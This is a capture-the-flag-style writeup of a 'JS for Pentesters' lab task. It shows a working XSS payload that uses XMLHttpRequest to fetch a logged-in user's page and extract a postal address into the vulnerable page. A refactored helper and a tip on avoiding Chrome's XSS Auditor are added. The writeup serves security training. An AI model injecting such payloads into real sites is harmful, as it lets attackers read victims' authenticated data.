XSS - HTML parsing with XMLHttpRequest(): JS for Pentesters task 18

Nov 2, 2014 • jsp, javascript, xss, security-tube

Writeup for task 18 of the JS for Pentesters series by SecurityTube: HTML Parsing with XMLHttpRequest().

XMLHttpRequest() is very powerful: it can retrieve HTML, JSON, XML and more as the response to a request, and this challenge exercises one of those cases. Usually when we make a request we get back a string, which is easy to manipulate and use for our own purposes. What if the response is an HTML page and we need to extract something out of it? This is what the challenge looks like:

JS for Pentesters task 18

Our objective is to find John's postal address using an XSS vulnerability on that page and display it in the div with id "result". Before moving on to solve this task, one thing to keep in mind: if we need an HTML document back as the response to an XMLHttpRequest(), we have to ask for it explicitly by setting **responseType = "document"** (after open() and before send()). Without it, responseXML stays null for a text/html response and there is nothing to query. So let us see how we cracked this. The payload is:

    <script>
    var req = new XMLHttpRequest();
    req.onreadystatechange = function () {
      // readystatechange also fires for the earlier states, where there is
      // no body yet; only act once the request is DONE (4) and succeeded (200).
      if (req.readyState == 4 && req.status == 200) {
        // Because responseType is "document", responseXML is the parsed page.
        var html = req.responseXML;
        var address = html.getElementById("address").innerHTML;
        document.getElementById("result").innerHTML = address;
      }
    };
    req.open("GET", "/lab/webapp/jfp/18/address", true);
    // Must come after open() and before send().
    req.responseType = "document";
    req.send();
    </script>

So how does this work? We send an XMLHttpRequest(), and because we set responseType to "document" before sending, the browser parses the response as an HTML document instead of handing us a string. We store that document in a variable named html, select the element with id "address" inside it (which holds the address we are looking for), and write its contents into the "result" element of the original page. Note that the request is same-origin, so the browser attaches the victim's cookies to it; this is why an XSS lets injected script read any page the victim can see, including pages behind a login. And there, the challenge is cracked ;)
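The same fetch-and-extract step written as a reusable helper, added here as an example and not taken from the original writeup. It keeps the two checks the payload relies on (only read the body at readyState 4 with status 200, and only after asking for a parsed document) and reports failures instead of silently writing "undefined". The element id "address", the URL and the FakeXHR class are assumptions made for illustration; FakeXHR exists only so the block runs outside a browser, where the real XMLHttpRequest would be used instead.

```javascript
// Added example, not the writeup's payload: fetch a same-origin page as a
// parsed HTML Document over XMLHttpRequest and read one element's text.
// Assumptions: the element id "address", the URL and FakeXHR below are
// illustrative; in a browser, omit the XHR option and the real
// XMLHttpRequest is used.

// Error-first callback, called exactly once: cb(err, doc).
function loadDocument(url, cb, { XHR = globalThis.XMLHttpRequest, asDocument = true } = {}) {
  const req = new XHR();
  req.onreadystatechange = function () {
    // readystatechange fires for states 1-4; only DONE (4) has a usable body.
    // Writing to the page on earlier events is how "undefined" ends up there.
    if (req.readyState !== 4) return;
    if (req.status !== 200) {
      cb(new Error("HTTP " + req.status + " for " + url), null);
      return;
    }
    // With responseType "document" the browser parses text/html into a
    // Document exposed on responseXML/response; with the default "" it
    // leaves responseXML null for HTML bodies.
    if (!req.responseXML) {
      cb(new Error("response not parsed as a document; set responseType"), null);
      return;
    }
    cb(null, req.responseXML);
  };
  req.open("GET", url, true);
  // Must be set after open() and before send().
  if (asDocument) req.responseType = "document";
  req.send();
}

function getTextById(doc, id) {
  const el = doc.getElementById(id);
  if (!el) throw new Error('no element with id "' + id + '"');
  // textContent, not innerHTML: the string only, not markup that would be
  // re-interpreted when written into the result div.
  return el.textContent.trim();
}

function fetchAddress(url, cb, opts) {
  loadDocument(url, function (err, doc) {
    if (err) return cb(err, null);
    try {
      cb(null, getTextById(doc, "address"));
    } catch (e) {
      cb(e, null);
    }
  }, opts);
}

// ---- Constructed stand-in so the block runs outside a browser ----
// Mimics only the XMLHttpRequest behaviour discussed above: the sequence of
// readystatechange events and the responseType rule. Not a real API.
class FakeXHR {
  constructor() {
    this.readyState = 0;
    this.status = 0;
    this.responseType = "";
    this.responseXML = null;
    this.onreadystatechange = null;
  }
  open(method, url) {
    this.url = url;
    this.readyState = 1;
  }
  send() {
    // Constructed body standing in for "/lab/webapp/jfp/18/address".
    const doc = {
      getElementById: (id) =>
        id === "address" ? { textContent: "  42 Example Lane, Springfield  " } : null,
    };
    const ok = this.url.endsWith("/address");
    const fire = (state) => {
      this.readyState = state;
      this.status = ok ? 200 : 404;
      if (state === 4 && ok && this.responseType === "document") this.responseXML = doc;
      if (this.onreadystatechange) this.onreadystatechange();
    };
    fire(2); // HEADERS_RECEIVED
    fire(3); // LOADING
    fire(4); // DONE
  }
}

// In a browser the payload reduces to:
// fetchAddress("/lab/webapp/jfp/18/address", (err, address) => {
//   if (!err) document.getElementById("result").textContent = address;
// });
```

Passing the constructor in as an option is what makes the state handling testable offline; in the real lab page the only change is dropping the option so the browser's XMLHttpRequest is used.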

Note:

1) While playing with XSS challenges, it is recommended to use Mozilla Firefox. At the time of writing, Google Chrome ships a built-in XSS Auditor that blocks reflected payloads it spots in the request, so arbitrary JavaScript may not execute even though the page is vulnerable. (The Auditor was later removed in Chrome 78.) So it is strongly recommended to use Firefox instead of Chrome.

We hope you liked this challenge. If there is anything you didn't understand or want more clarity on, please comment below and we are more than happy to help. Also, if you find a better way of solving the challenge, please share it with us; we are happy to learn from our readers too. Happy pentesting!

Anirudh Anand

Head of Product Security & DevSecOps at @CRED_club | Application Security ♥ | CTF lover - @teambi0s | Security Trainer - @7asecurity | certs - eWDP, OSCP, OSWE